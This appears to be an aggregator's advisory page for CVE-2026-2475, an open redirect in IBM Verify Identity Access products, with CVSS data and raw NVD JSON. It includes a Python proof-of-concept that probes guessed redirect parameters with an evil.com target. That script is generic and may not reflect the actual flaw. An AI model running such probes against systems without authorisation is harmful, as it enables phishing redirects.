Security Vulnerability Report
中文
CVE-2026-2475 CVSS 3.1 LOW

CVE-2026-2475

Published: 2026-04-01 21:16:59
Last Modified: 2026-04-07 16:31:56
Source: [email protected]

Description

IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability. An attacker could exploit this vulnerability using a specially crafted request to redirect a victim to arbitrary Web sites.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:security_verify_access_container:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:verify_identity_access_container:*:*:*:*:*:*:*:* - VULNERABLE
IBM Verify Identity Access Container 11.0 through 11.0.2
IBM Security Verify Access Container 10.0 through 10.0.9.1
IBM Verify Identity Access 11.0 through 11.0.2
IBM Security Verify Access 10.0 through 10.0.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-2475 (Open Redirect) # Target: IBM Verify Identity Access / Security Verify Access import requests def test_open_redirect(target_url): """ Tests for open redirect vulnerability by injecting a malicious redirect parameter. """ # Common parameters that might be vulnerable params = [ {"url": "https://evil.com"}, {"redirect": "https://evil.com"}, {"next": "//evil.com"}, {"target": "//evil.com"}, {"goto": "https://evil.com"} ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } for param_set in params: try: # Send GET request with the payload response = requests.get(target_url, params=param_set, headers=headers, allow_redirects=False) # Check if the Location header contains the evil domain if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if 'evil.com' in location: print(f"[+] Vulnerable Found!") print(f" Parameter: {param_set}") print(f" Redirect Location: {location}") return True except Exception as e: print(f"Error testing {param_set}: {e}") print("[-] No open redirect detected with common payloads.") return False if __name__ == "__main__": # Replace with the actual vulnerable endpoint target = "http://target-host/iva/sso/oauth20/authorize" # Example endpoint test_open_redirect(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2475", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:16:58.860", "lastModified": "2026-04-07T16:31:56.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability. An attacker could exploit this vulnerability using a specially crafted request to redirect a victim to arbitrary Web sites."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndIncluding": "10.0.9.1", "matchCriteriaId": "11212874-804C-42B2-AF5F-116F5C367237"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_access_container:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0.0", "versionEndIncluding": "10.0.9.1", "matchCriteriaId": "674B3E72-09DE-48D4-9F07-43152474E8CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndIncluding": "11.0.2.0", "matchCriteriaId": "980521A4-FDCB-4EC4-9871-6CD57DEC14E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:verify_identity_access_container:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0.0", "versionEndIncluding": "11.0.2.0", "matchCriteriaId": "3FDCBF44-E483-4248-A39E-CB9226FF4BC9"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7268253", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.